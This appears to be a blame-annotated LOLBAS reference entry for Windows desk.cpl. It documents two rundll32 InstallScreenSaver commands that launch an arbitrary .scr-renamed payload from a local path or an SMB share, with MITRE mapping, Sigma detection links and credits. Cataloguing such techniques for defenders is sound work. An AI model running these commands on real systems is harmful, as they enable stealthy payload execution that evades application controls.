2022-04-27 12:15:15 +02:00
|
|
|
---
|
2022-04-27 12:20:13 +02:00
|
|
|
Name: Desk.cpl
|
2022-04-27 12:15:15 +02:00
|
|
|
Description: Desktop Settings Control Panel
|
|
|
|
Author: Hai Vaknin
|
|
|
|
Created: 2022-04-21
|
|
|
|
Commands:
|
|
|
|
- Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr
|
|
|
|
Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function.
|
|
|
|
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218.011
|
|
|
|
OperatingSystem: Windows 10, Windows 11
|
|
|
|
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
|
|
|
|
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
|
|
|
|
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218.011
|
2022-09-11 07:07:18 +02:00
|
|
|
OperatingSystem: Windows 10, Windows 11
|
2022-04-27 12:15:15 +02:00
|
|
|
Full_Path:
|
|
|
|
- Path: C:\Windows\System32\desk.cpl
|
|
|
|
- Path: C:\Windows\SysWOW64\desk.cpl
|
|
|
|
Detection:
|
2023-10-18 17:30:34 +02:00
|
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml
|
|
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml
|
2022-12-29 15:51:15 +01:00
|
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
|
2022-04-27 12:15:15 +02:00
|
|
|
Resources:
|
2022-04-28 14:01:35 +02:00
|
|
|
- Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt
|
2022-04-27 12:15:15 +02:00
|
|
|
- Link: https://twitter.com/pabraeken/status/998627081360695297
|
|
|
|
- Link: https://twitter.com/VakninHai/status/1517027824984547329
|
2022-05-15 16:42:44 +02:00
|
|
|
- Link: https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
|
2022-04-27 12:15:15 +02:00
|
|
|
Acknowledgement:
|
2022-04-28 14:01:35 +02:00
|
|
|
- Person: Rafael S Marques
|
|
|
|
Handle: '@pegabizu'
|
2022-04-27 12:15:15 +02:00
|
|
|
- Person: Pierre-Alexandre Braeken
|
|
|
|
Handle: '@pabraeken'
|
|
|
|
- Person: hai
|
|
|
|
Handle: '@VakninHai'
|
2022-04-30 05:06:41 +02:00
|
|
|
- Person: Christopher Peacock
|
2022-04-30 04:52:57 +02:00
|
|
|
Handle: '@SecurePeacock'
|
2022-05-15 16:42:44 +02:00
|
|
|
- Person: Jose Luis Sanchez
|
|
|
|
Handle: '@Joseliyo_Jstnk'
|